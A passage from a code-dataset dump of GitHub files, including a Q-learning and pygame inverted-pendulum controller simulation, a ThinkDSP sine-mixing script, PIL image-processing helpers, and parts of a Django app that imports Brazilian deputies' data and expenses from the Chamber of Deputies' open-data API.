normalized_action = self.normalize_action(original_action)\n\n for a in range(self.Q.shape[0]):\n for b in range(self.Q.shape[1]):\n self.Q[(a, b,i, j, normalized_action)] = self.initial_fuzzy_Q\n\n def normalize_state(self, state):\n first = int( (state[2]) / ( 2.0 * self.max_theta ) * self.Q.shape[2] )\n second = int( (state[3] + self.max_dtheta) / ( 2.0 * self.max_dtheta ) * self.Q.shape[3] )\n third = int( (state[0] + self.max_x) / ( 2.0 * self.max_x ) * self.Q.shape[0] )\n fourth = int( (state[1] + self.max_dx) / ( 2.0 * self.max_dx ) * self.Q.shape[1] )\n\n return ( third, fourth, first, second )\n\n def denormalize_state(self, state):\n first = (float(state[2]) / self.Q.shape[2] * 2.0 * self.max_theta)\n second = (float(state[3]) / self.Q.shape[3] * 2.0 * self.max_dtheta - self.max_dtheta)\n third = (float(state[0]) / self.Q.shape[0] * 2.0 * self.max_x - self.max_x)\n fourth = (float(state[1]) / self.Q.shape[1] * 2.0 * self.max_dx - self.max_dx)\n\n return ( third, fourth, first, second )\n\n def denormalize_action(self, action):\n half = (self.n_action - 1) / 2\n if action == half:\n return 0\n else:\n return 2 / (self.n_action - 1) * (action - half)\n\n def sgn(self, x):\n if x >= 0:\n return 1\n else: \n return -1\n\n def normalize_action(self, action):\n if abs(action) < 0.0001:\n return int( (self.n_action - 1) / 2 )\n else:\n return int( (self.n_action - 1) / 2 + action / (2 / (self.n_action - 1) ) )\n\n def action(self, state, k = 3):\n state = self.normalize_state(state)\n\n actions = self.Q[state]\n\n normalization_factor = None\n minimal_action = min(actions)\n if minimal_action < 0:\n normalization_factor = -minimal_action\n else:\n normalization_factor = 0\n\n actions = [ (i, actions[i]) for i in range(len(actions)) ]\n max_action = max(actions, key=lambda x: x[1])\n return max_action[0], self.denormalize_action(max_action[0])\n\n probabilities = []\n total = 0\n for a in range( len(actions) ):\n curr_probability = k ** ( self.Q[ tuple( list(state) + [a] ) ] + normalization_factor )\n probabilities.append(total + curr_probability)\n total = total + curr_probability\n\n probabilities = [p / total for p in probabilities]\n\n chance = random.random()\n for i in range(len(probabilities)):\n if chance < probabilities[i]:\n return i, self.denormalize_action(i)\n\n def update(self, s, a, next_s, r, gamma = 0.7, alpha=1):\n\n if tuple(list(s) + [a]) not in self.visits:\n self.visits[ tuple(list(s) + [a]) ] = 1\n else:\n self.visits[ tuple(list(s) + [a]) ] += 1\n \n alpha = 1\n \n s = self.normalize_state(s)\n next_s = self.normalize_state(next_s)\n\n max_action = max( list(self.Q[ tuple(next_s) ]) )\n self.Q[ tuple( list(s) + [a] ) ] = self.Q[ tuple( list(s) + [a] ) ] + \\\n alpha * ( r + gamma * max_action - self.Q[ tuple(list(s) + [a]) ])\n\nif __name__ == \"__main__\":\n q = QLearning(89*pi / 180, 100, 100, 100, 200)\n\n q_str = \"\"\n for i in range( q.Q.shape[0] ):\n for j in range(q.Q.shape[0]):\n for k in range(q.Q.shape[0]):\n q_str += str( q.Q[ (i, j, k) ] ) + \" \"\n q_str += \"\\n\"\n q_str += \"\\n\"\n\n print(q_str)\n" }, { "alpha_fraction": 0.386682391166687, "alphanum_fraction": 0.5418796539306641, "avg_line_length": 36.49140167236328, "blob_id": "42085fd3229118ad57539a201626c35c2690fcd9", "content_id": "c5c8a6bd950bc94851e3f67804ceabd6ac13c8e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15462, "license_type": "no_license", "max_line_length": 92, "num_lines": 407, "path": "/inverted_pendulum (1)/pendulum.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from math import *\nfrom numpy import *\nimport pygame\nimport numpy as np\nimport control.matlab\nfrom main import InvertedPendulumBalancer\n\n\ndt = 0.01\ng = 9.81\nl = 1.0\nm = 1.0\n\nglobal k1, k2, k3\nk1 = 500000\nk2 = 10000\nk3 = 10000\n\nglobal q1, q2, q3, q4, r\nq1 = 0.001\nq2 = 0.001\nq3 = 1000000000\nq4 = 20000000\nr = 0.005\n\nclock = pygame.time.Clock()\npygame.init()\nsize = (width, height) = (1800, 1000)\nscreen = pygame.display.set_mode(size)\n\n\nclass Pendulum:\n def __init__(self, x0, y0, phi0):\n self.phi0 = phi0\n self.phi = phi0\n self.velocity = 0\n self.x0 = x0\n self.y0 = y0\n self.x0_vel = 0\n self.x = x0 + 250.0 * sin(phi0)\n self.y = y0 + 250.0 * cos(phi0)\n\n self.t = dt\n self.t = np.arange(0, 30, 0.01)\n\n self.phi_chart_t = 20\n self.phi_chart = [(self.phi_chart_t, 820)]\n\n self.x_chart_t = 20\n self.x_chart = [(self.x_chart_t, 480)]\n\n def move(self, control):\n self.phi = atan2(self.x - self.x0, self.y - self.y0)\n d_velocity = -g * sin(self.phi) * dt / l\n self.velocity += d_velocity\n d_phi = dt * self.velocity\n self.phi += d_phi\n self.x = self.x0 + 250.0 * sin(self.phi)\n self.y = self.y0 + 250.0 * cos(self.phi)\n\n d_x0_vel = dt * control\n self.x0_vel += d_x0_vel\n dx0 = dt * self.x0_vel\n self.x0 += dx0\n\n def draw(self):\n pygame.draw.circle(screen, (0, 0, 0), [int(self.x0), int(self.y0)], 5)\n pygame.draw.line(screen, (0, 0, 0), [self.x0, self.y0], [self.x, self.y], 2)\n pygame.draw.circle(screen, (255, 0, 0), [int(self.x), int(self.y)], 10)\n pygame.draw.line(screen, (0, 0, 0), [0, self.y0], [1800, self.y0], 3)\n\n self.phi_chart_t += 0.2\n if self.phi_chart_t > size[0]:\n self.phi_chart_t = 0\n self.phi_chart = [(self.phi_chart_t, 820)]\n angle = np.pi - self.phi if self.phi > 0 else -np.pi - self.phi\n self.phi_chart.append((self.phi_chart_t, 300 * angle + 820))\n pygame.draw.lines(screen, (255, 0, 0), False, self.phi_chart, 3)\n pygame.draw.line(screen, (0, 0, 0), [20, 820], [1780, 820], 2)\n pygame.draw.line(screen, (0, 0, 0), [20, 660], [20, 980], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 665], [1780, 665], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 975], [1780, 975], 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((18, 660), (20, 650), (22, 660)), 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((1770, 822), (1780, 820), (1770, 818)), 2)\n print(self.phi)\n\n self.x_chart_t += 0.2\n if self.x_chart_t > size[0]:\n self.x_chart_t = 0\n self.x = [(self.x_chart_t, 480)]\n move = self.x\n self.x_chart.append((self.x_chart_t, -0.2 * move + 683))\n pygame.draw.lines(screen, (0, 255, 0), False, self.x_chart, 3)\n pygame.draw.line(screen, (0, 0, 0), [20, 480], [1780, 480], 2)\n pygame.draw.line(screen, (0, 0, 0), [20, 620], [20, 340], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 345], [1780, 345], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 615], [1780, 615], 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((18, 340), (20, 330), (22, 340)), 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((1770, 482), (1780, 480), (1770, 478)), 2)\n print(self.x)\n\n\nclass PID:\n def __init__(self, k1, k2, k3, pendulum):\n self.k1 = k1\n self.k2 = k2\n self.k3 = k3\n self.p = pendulum\n self.error = pi - self.p.phi\n self.derivative = 0\n self.integral = 0\n\n def update(self):\n self.k1 = k1\n self.k2 = k2\n self.k3 = k3\n\n tmp = self.error\n self.error = copysign(1, p.phi) * (pi - abs(self.p.phi)) + (self.p.x0 - 600) / 10000\n diff = self.error - tmp\n self.derivative = diff / dt\n self.integral += tmp\n\n def output(self):\n return self.k1 * self.error + self.k2 * self.derivative + self.k3 * self.integral\n\n\nclass LQR:\n def __init__(self, q1, q2, q3, q4, r, pendulum):\n self.q1 = q1\n self.q2 = q2\n self.q3 = q3\n self.q4 = q4\n self.p = pendulum\n self.A = matrix([[0, 1, 0, 0], [0, 0, -g, 0], [0, 0, 0, 1], [0, 0, 2 * g, 0]])\n self.B = matrix([[0], [1], [0], [-1]])\n self.Q = diag([q1, q2, q3, q4])\n self.R = r\n self.K = control.matlab.lqr(self.A, self.B, self.Q, self.R)[0]\n print(self.K)\n\n def update(self):\n self.q1 = q1\n self.q2 = q2\n self.q3 = q3\n self.q4 = q4\n self.Q = diag([q1, q2, q3, q4])\n self.K = control.matlab.lqr(self.A, self.B, self.Q, self.R)[0]\n\n def output(self):\n X = matrix([[-(self.p.x0 - 600) / 10], [self.p.x0_vel / 10],\n [copysign(1, self.p.phi) * (-pi + abs(self.p.phi))], [self.p.velocity]])\n U = self.K * X\n return U.flat[0]\n\n\nclass DrawPID:\n def draw_text(self):\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Пропорциональный коэффициент: %d\" % k1, 1, (255, 0, 0))\n screen.blit(label1, (100, 400))\n label2 = myfont.render(\"Дифференциальный коэффициент: %d\" % k2, 1, (255, 0, 0))\n screen.blit(label2, (100, 420))\n label3 = myfont.render(\"Интегральный коэффициент: %.1f\" % k3, 1, (255, 0, 0))\n screen.blit(label3, (100, 440))\n\n\n def make_buttons(k1, k2, k3, pid, pend):\n pygame.draw.rect(screen, (0, 0, 255), [420, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 440, 90, 15])\n\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Повысить\", 1, (255, 255, 255))\n label2 = myfont.render(\"Понизить\", 1, (255, 255, 255))\n screen.blit(label1, (420, 400))\n screen.blit(label2, (520, 400))\n screen.blit(label1, (420, 420))\n screen.blit(label2, (520, 420))\n screen.blit(label1, (420, 440))\n screen.blit(label2, (520, 440))\n\n if pygame.mouse.get_pressed()[0]:\n (pos1, pos2) = pygame.mouse.get_pos()\n if 420 <= pos1 <= 510 and 400 <= pos2 <= 415:\n k1 += 10\n elif 520 <= pos1 <= 610 and 400 <= pos2 <= 415:\n k1 -= 10\n elif 420 <= pos1 <= 510 and 420 <= pos2 <= 435:\n k2 += 1\n elif 520 <= pos1 <= 610 and 420 <= pos2 <= 435:\n k2 -= 1\n elif 420 <= pos1 <= 510 and 440 <= pos2 <= 455:\n k3 += 0.1\n elif 520 <= pos1 <= 610 and 440 <= pos2 <= 455:\n k3 -= 0.1\n\n return k1, k2, k3\n\n\nclass DrawLQR:\n def draw_text(self):\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Параметр положения тележки: %.5f\" % q1, 1, (255, 0, 0))\n screen.blit(label1, (50, 400))\n label2 = myfont.render(\"Параметр скорости тележки: %.5f\" % q2, 1, (255, 0, 0))\n screen.blit(label2, (50, 420))\n label3 = myfont.render(\"Параметр углового положения: %.1f\" % q3, 1, (255, 0, 0))\n screen.blit(label3, (50, 440))\n label3 = myfont.render(\"Параметр угловой скорости: %.1f\" % q4, 1, (255, 0, 0))\n screen.blit(label3, (50, 460))\n\n\n def make_buttons(q1, q2, q3, q4, lqr, pend):\n pygame.draw.rect(screen, (0, 0, 255), [420, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 460, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 460, 90, 15])\n\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Повысить\", 1, (255, 255, 255))\n label2 = myfont.render(\"Понизить\", 1, (255, 255, 255))\n screen.blit(label1, (420, 400))\n screen.blit(label2, (520, 400))\n screen.blit(label1, (420, 420))\n screen.blit(label2, (520, 420))\n screen.blit(label1, (420, 440))\n screen.blit(label2, (520, 440))\n screen.blit(label1, (420, 460))\n screen.blit(label2, (520, 460))\n\n if (pygame.mouse.get_pressed()[0]):\n (pos1, pos2) = pygame.mouse.get_pos()\n if 420 <= pos1 <= 510 and 400 <= pos2 <= 415:\n q1 += 0.001\n elif 520 <= pos1 <= 610 and 400 <= pos2 <= 415:\n q1 -= 0.001\n if q1 < 0.001: q1 += 0.001\n elif 420 <= pos1 <= 510 and 420 <= pos2 <= 435:\n q2 += 0.001\n elif 520 <= pos1 <= 610 and 420 <= pos2 <= 435:\n q2 -= 0.001\n elif 420 <= pos1 <= 510 and 440 <= pos2 <= 455:\n q3 += 1000\n elif 520 <= pos1 <= 610 and 440 <= pos2 <= 455:\n q3 -= 1000\n elif 420 <= pos1 <= 510 and 460 <= pos2 <= 475:\n q4 += 10\n elif 520 <= pos1 <= 610 and 460 <= pos2 <= 475:\n q4 -= 10\n\n return q1, q2, q3, q4\n\n\ndef draw_designation():\n myfont = pygame.font.SysFont(\"monospace\", 20)\n label1 = myfont.render(\"X\", 1, (128, 128, 128))\n screen.blit(label1, (5, 470))\n label2 = myfont.render(\"PHI\", 1, (128, 128, 128))\n screen.blit(label2, (0, 640))\n label3 = myfont.render(\"I\", 1, (128, 128, 128))\n screen.blit(label3, (1785, 820))\n screen.blit(label3, (1785, 550))\n label4 = myfont.render(\"PI/3\", 1, (128, 128, 128))\n screen.blit(label4, (25, 665))\n label5 = myfont.render(\"0\", 1, (128, 128, 128))\n screen.blit(label5, (20, 820))\n screen.blit(label5, (20, 480))\n label6 = myfont.render(\"-PI/3\", 1, (128, 128, 128))\n screen.blit(label6, (20, 955))\n label7 = myfont.render(\"550\", 1, (128, 128, 128))\n screen.blit(label7, (25, 345))\n label8 = myfont.render(\"-550\", 1, (128, 128, 128))\n screen.blit(label8, (20, 600))\n #label9 = myfont.render(\"100\", 1, (128, 128, 128))\n #screen.blit(label9, (70, 820))\n #screen.blit(label9, (70, 480))\n label10 = myfont.render(\"100\", 1, (128, 128, 128))\n screen.blit(label10, (135, 820))\n screen.blit(label10, (135, 480))\n #label11 = myfont.render(\"300\", 1, (128, 128, 128))\n #screen.blit(label11, (198, 820))\n #screen.blit(label11, (198, 480))\n label12 = myfont.render(\"200\", 1, (128, 128, 128))\n screen.blit(label12, (260, 820))\n screen.blit(label12, (260, 480))\n #label13 = myfont.render(\"500\", 1, (128, 128, 128))\n #screen.blit(label13, (322, 820))\n #screen.blit(label13, (322, 550))\n label14 = myfont.render(\"300\", 1, (128, 128, 128))\n screen.blit(label14, (385, 820))\n screen.blit(label14, (385, 480))\n #label15 = myfont.render(\"700\", 1, (128, 128, 128))\n #screen.blit(label15, (447, 820))\n #screen.blit(label15, (447, 550))\n label16 = myfont.render(\"400\", 1, (128, 128, 128))\n screen.blit(label16, (510, 820))\n screen.blit(label16, (510, 480))\n #label17 = myfont.render(\"900\", 1, (128, 128, 128))\n #screen.blit(label17, (572, 820))\n #screen.blit(label17, (572, 550))\n label18 = myfont.render(\"500\", 1, (128, 128, 128))\n screen.blit(label18, (635, 820))\n screen.blit(label18, (635, 480))\n #label19 = myfont.render(\"1100\", 1, (128, 128, 128))\n #screen.blit(label19, (697, 820))\n #screen.blit(label19, (697, 550))\n label20 = myfont.render(\"600\", 1, (128, 128, 128))\n screen.blit(label20, (760, 820))\n screen.blit(label20, (760, 480))\n #label21 = myfont.render(\"1300\", 1, (128, 128, 128))\n #screen.blit(label21, (822, 820))\n #screen.blit(label21, (822, 550))\n label22 = myfont.render(\"700\", 1, (128, 128, 128))\n screen.blit(label22, (885, 820))\n screen.blit(label22, (885, 480))\n #label23 = myfont.render(\"1500\", 1, (128, 128, 128))\n #screen.blit(label23, (947, 820))\n #screen.blit(label23, (947, 550))\n label24 = myfont.render(\"800\", 1, (128, 128, 128))\n screen.blit(label24, (1010, 820))\n screen.blit(label24, (1010, 480))\n #label25 = myfont.render(\"1700\", 1, (128, 128, 128))\n #screen.blit(label25, (1072, 820))\n #screen.blit(label25, (1072, 550))\n label26 = myfont.render(\"900\", 1, (128, 128, 128))\n screen.blit(label26, (1135, 820))\n screen.blit(label26, (1135, 480))\n #label27 = myfont.render(\"1900\", 1, (128, 128, 128))\n #screen.blit(label27, (1197, 820))\n #screen.blit(label27, (1197, 550))\n label28 = myfont.render(\"1000\", 1, (128, 128, 128))\n screen.blit(label28, (1260, 820))\n screen.blit(label28, (1260, 480))\n #label29 = myfont.render(\"2100\", 1, (128, 128, 128))\n #screen.blit(label29, (1322, 820))\n #screen.blit(label29, (1322, 550))\n label30 = myfont.render(\"1100\", 1, (128, 128, 128))\n screen.blit(label30, (1385, 820))\n screen.blit(label30, (1385, 480))\n #label31 = myfont.render(\"2300\", 1, (128, 128, 128))\n #screen.blit(label31, (1447, 820))\n #screen.blit(label31, (1447, 550))\n label32 = myfont.render(\"1200\", 1, (128, 128, 128))\n screen.blit(label32, (1510, 820))\n screen.blit(label32, (1510, 480))\n #label33 = myfont.render(\"2500\", 1, (128, 128, 128))\n #screen.blit(label33, (1572, 820))\n #screen.blit(label33, (1572, 550))\n label34 = myfont.render(\"1300\", 1, (128, 128, 128))\n screen.blit(label34, (1635, 820))\n screen.blit(label34, (1635, 480))\n #label35 = myfont.render(\"2700\", 1, (128, 128, 128))\n #screen.blit(label35, (1697, 820))\n #screen.blit(label35, (1697, 550))\n\n\np = Pendulum(900, 300, pi - 30*pi / 180)\npid = PID(k1, k2, k3, p)\nlqr = LQR(q1, q2, q3, q4, r, p)\n\nwhile 1:\n screen.fill((255, 255, 255))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_1:\n pid.update()\n p.move(pid.output())\n #DrawPID.draw_text(DrawPID)\n #(k1, k2, k3) = DrawPID.make_buttons(k1, k2, k3, pid, p)\n if event.key == pygame.K_2:\n lqr.update()\n p.move(lqr.output())\n #DrawLQR.draw_text(DrawLQR)\n #(q1, q2, q3, q4) = DrawLQR.make_buttons(q1, q2, q3, q4, lqr, p)\n if event.key == pygame.K_3:\n balancer = InvertedPendulumBalancer()\n balancer.run()\n\n pygame.event.set_blocked(pygame.MOUSEMOTION)\n pygame.event.set_blocked(pygame.MOUSEBUTTONUP)\n pygame.event.set_blocked(pygame.MOUSEBUTTONDOWN)\n pygame.event.set_blocked(pygame.ACTIVEEVENT)\n\n\n #pid.update()\n #lqr.update()\n #p.move(pid.output())\n #p.move(lqr.output())\n p.draw()\n #DrawPID.draw_text(DrawPID)\n #DrawLQR.draw_text(DrawLQR)\n draw_designation()\n #(k1, k2, k3) = DrawPID.make_buttons(k1, k2, k3, pid)\n #(q1, q2, q3, q4) = DrawLQR.make_buttons(q1, q2, q3, q4, lqr, p)\n\n clock.tick(60)\n pygame.display.flip()" } ]
5
rubenbc7/Frecuencia-Fourier
https://github.com/rubenbc7/Frecuencia-Fourier
a1182de72c8d2a04a47e5de552c48896daccff21
e64214b87470fb6747b02dc2ca89fc7f7fb541a2
dc0690f78b2692a969f390211c20c0c363d4e8ea
refs/heads/master
2022-12-18T00:43:02.997193
2020-09-15T05:23:55
2020-09-15T05:23:55
295,622,887
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7235772609710693, "alphanum_fraction": 0.7621951103210449, "avg_line_length": 22.4761905670166, "blob_id": "f03cd42b1e514b37c7f142b0f47e5e5f8cdad489", "content_id": "b3ff190d2db5b7f6f082b1090b3397c3dd28d97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 67, "num_lines": 21, "path": "/frecuencia.py", "repo_name": "rubenbc7/Frecuencia-Fourier", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(1,'dsp-modulo')\n\nfrom thinkdsp import SinSignal\nfrom thinkdsp import decorate\nimport thinkplot\n\nsenalUno = SinSignal (freq=380, amp=0.1, offset=0)\nsenalDos = SinSignal(freq=200, amp=1, offset=0)\n\nmezcla = senalUno + senalDos\nwaveMezcla = mezcla.make_wave(duration=1, start=0, framerate=44100)\nwaveMezcla.plot()\n\ndecorate(xlabel=\"Timepo (s)\")\nthinkplot.show()\n\nespectro = waveMezcla.make_spectrum()\nespectro.plot()\ndecorate(xlabel=\"Frecuencia (Hz)\")\nthinkplot.show()" } ]
1
gattonic/python-image-operations
https://github.com/gattonic/python-image-operations
a3edc16d7007c4daa4c9d298ff101cd9e7f55249
4e6f09d872051cfea8046d3c04975c649e105e8d
1fdcf97aefcb82f0877a421c31cc91345404df5a
refs/heads/master
2021-01-16T19:36:47.387107
2017-08-13T14:17:33
2017-08-13T14:17:33
100,181,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 25, "blob_id": "330812d8e479f243e264df67539ee8d98eda31a2", "content_id": "41d9632edb1805e149406e89af33218e92f89458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/README.md", "repo_name": "gattonic/python-image-operations", "src_encoding": "UTF-8", "text": "# python-image-operations" }, { "alpha_fraction": 0.6537376642227173, "alphanum_fraction": 0.6629055142402649, "avg_line_length": 30.488889694213867, "blob_id": "2cf37347ef0169754a328ba6c91e110d5221a067", "content_id": "5b15e9d74b3b1d5d749769ef1723eba911b7c3ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 92, "num_lines": 45, "path": "/image_operations.py", "repo_name": "gattonic/python-image-operations", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport numpy as np\n\n\ndef load_greyscale(image, return_as_array=True, show_image=False, save_image=False):\n img = Image.open(image)\n img = img.convert('L')\n\n return __option_routine(img, return_as_array, show_image, save_image)\n\n\ndef load_binary(image, threshold, return_as_array=True, show_image=False, save_image=False):\n img = load_greyscale(image, return_as_array=False)\n (width, height) = img.size\n img_pixel_map = img.load()\n\n binary_img = Image.new('1', img.size)\n binary_img_pixel_map = binary_img.load()\n\n for x in range(0, width):\n for y in range(0, height):\n binary_img_pixel_map[x,y] = 1 if img_pixel_map[x,y] >= threshold else 0\n\n return __option_routine(binary_img, return_as_array, show_image, save_image)\n\n\ndef gamma_correction(img, gamma, return_as_array=True, show_image=False, save_image=False):\n img_array = np.asarray(img)\n img_corrected_array = 255 * ((img_array/255) ** (1/gamma))\n img_corrected_array = np.uint8(img_corrected_array)\n img_corrected = Image.fromarray(img_corrected_array, img.mode)\n return __option_routine(img_corrected, return_as_array, show_image, save_image)\n\n\ndef __option_routine(img, return_as_array, show_image, save_image):\n if show_image:\n img.show()\n\n if save_image:\n img.save(img + \".jpg\")\n\n if return_as_array:\n img = np.asarray(img)\n\n return img\n\n" } ]
2
labcodes/dados_brasil_io
https://github.com/labcodes/dados_brasil_io
8286946577248b65d7e1ddb375c4dd8fc208f0d1
4f1cc3daa3465b03e927edbc4e845d71281b26a0
227725944927b2311be5243dbc92d770c7061007
refs/heads/master
2022-12-10T06:20:51.003603
2019-10-29T13:42:51
2019-10-29T13:42:51
132,934,926
7
0
null
2018-05-10T17:44:50
2020-01-21T21:03:57
2022-01-21T19:10:46
Python
[ { "alpha_fraction": 0.6439655423164368, "alphanum_fraction": 0.6448276042938232, "avg_line_length": 26.619047164916992, "blob_id": "b9e63517616baaf80bbd68c5d2bef90e6cd5151f", "content_id": "247dad441771a3ac6540f06ae88c07fc7139f7e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/politicos/views.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import date\nfrom rest_framework import generics, serializers\nfrom rest_framework.response import Response\n\nfrom politicos.models import Deputado, GastoCotaParlamentar\n\n\nclass GastoCotaParlamentarSerializer(serializers.ModelSerializer):\n class Meta:\n model = GastoCotaParlamentar\n fields = '__all__'\n\n\nclass DeputadoSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Deputado\n fields = [\n 'id', 'nome', 'partido', 'uf', 'id_legislatura',\n 'gastos'\n ]\n depth = 2\n\n\nclass DeputadoListView(generics.ListAPIView):\n serializer_class = DeputadoSerializer\n\n def get_queryset(self):\n queryset = Deputado.objects.all().select_related('partido', 'uf')\n\n hoje = date.today()\n filtros = self.request.query_params.dict()\n filtros.setdefault('gastos_mes', hoje.month)\n filtros.setdefault('gastos_ano', hoje.year)\n\n queryset = queryset.prefetch_gastos(**{\n campo.replace('gastos_', ''): valor\n for campo, valor in filtros.items()\n if campo.startswith('gastos_')\n })\n\n return queryset\n" }, { "alpha_fraction": 0.5182795524597168, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 21.14285659790039, "blob_id": "0a0558e6e9971caa6b7d5f6ed0e7769b767f7376", "content_id": "17697defd2c727bc51e83a07dbcb3025c070fbe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": "/comum/migrations/0001_initial.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:25\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Estado',\n fields=[\n ('sigla', models.CharField(max_length=2, primary_key=True, serialize=False)),\n ('nome', models.CharField(max_length=255)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5836092829704285, "alphanum_fraction": 0.5877483487129211, "avg_line_length": 30.789474487304688, "blob_id": "15e9b6a963fded9161fb1aed5d04e4ad7647f6de", "content_id": "06e82a5b4a0c506c6e9a48053db26b18d14a7119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 98, "num_lines": 38, "path": "/politicos/management/commands/import_deputados.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import requests\nfrom django.core.management import BaseCommand\n\nfrom politicos.models import Deputado\n\nclass Command(BaseCommand):\n\n def pega_proxima_pagina(self, resposta):\n tem_proxima_pagina = [\n link['href'] for link in resposta['links']\n if link['rel'] == 'next'\n ]\n return tem_proxima_pagina and tem_proxima_pagina[0]\n\n\n def handle(self, *args, **options):\n deputados = []\n\n camara_url = 'https://dadosabertos.camara.leg.br/api/v2/deputados/?formato=json&itens=100'\n\n resposta = requests.get(camara_url).json()\n\n proxima_pagina = self.pega_proxima_pagina(resposta)\n\n while proxima_pagina:\n for deputado in resposta['dados']:\n deputados.append(Deputado(\n id=deputado['id'],\n nome=deputado['nome'],\n partido_id=deputado['siglaPartido'],\n uf_id=deputado['siglaUf'],\n id_legislatura=deputado['idLegislatura']\n ))\n\n resposta = requests.get(proxima_pagina).json()\n proxima_pagina = self.pega_proxima_pagina(resposta)\n\n Deputado.objects.bulk_create(deputados)\n" }, { "alpha_fraction": 0.7204724550247192, "alphanum_fraction": 0.7559055089950562, "avg_line_length": 24.399999618530273, "blob_id": "6a3d21e4e43d5725bd48086b1615e7c22c11bb0a", "content_id": "db0a294a84fcb72801ac8cc1cdb7793bb4f550e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 254, "license_type": "no_license", "max_line_length": 75, "num_lines": 10, "path": "/docker/django/entrypoint.sh", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nuntil python manage.py migrate --settings=dados_brasil_io.settings\ndo\n echo \"Esperando pela database...\"\n sleep 2\ndone\n\npython manage.py collectstatic\npython manage.py runserver 0.0.0.0:8000 --settings=dados_brasil_io.settings\n" }, { "alpha_fraction": 0.49346405267715454, "alphanum_fraction": 0.6993464231491089, "avg_line_length": 15.54054069519043, "blob_id": "b81a3fcd07d4f5c42410b18e159530a64fd3bc46", "content_id": "061bb2cfe65552302fe4f74cdb4ddd6fa8cd0f82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 612, "license_type": "no_license", "max_line_length": 26, "num_lines": 37, "path": "/requirements.txt", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "backcall==0.1.0\ncertifi==2018.4.16\nchardet==3.0.4\ncycler==0.10.0\ndateutils==0.6.6\ndecorator==4.2.1\nDjango==2.0.4\ndjangorestframework==3.9.1\nidna==2.6\nipdb==0.11\nipython==6.3.1\nipython-genutils==0.2.0\njedi==0.11.1\nkiwisolver==1.0.1\nmatplotlib==2.2.2\nnumpy==1.14.3\npandas==0.22.0\nparso==0.1.1\npexpect==4.5.0\npickleshare==0.7.4\nprompt-toolkit==1.0.15\npsycopg2==2.7.4\nptyprocess==0.5.2\nPygments==2.2.0\npyparsing==2.2.0\npython-dateutil==2.7.2\npython-decouple==3.1\npytz==2018.4\nrequests==2.18.4\nrows==0.3.1\nsimplegeneric==0.8.1\nsix==1.11.0\ntqdm==4.22.0\ntraitlets==4.3.2\nunicodecsv==0.14.1\nurllib3==1.22\nwcwidth==0.1.7\n" }, { "alpha_fraction": 0.541436493396759, "alphanum_fraction": 0.580110490322113, "avg_line_length": 23.68181800842285, "blob_id": "a375cf29cad55dd5b025880c30f23b50494f5f7a", "content_id": "a9b1fcc23c9126a404fd40eec30e56ecb40bcce3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 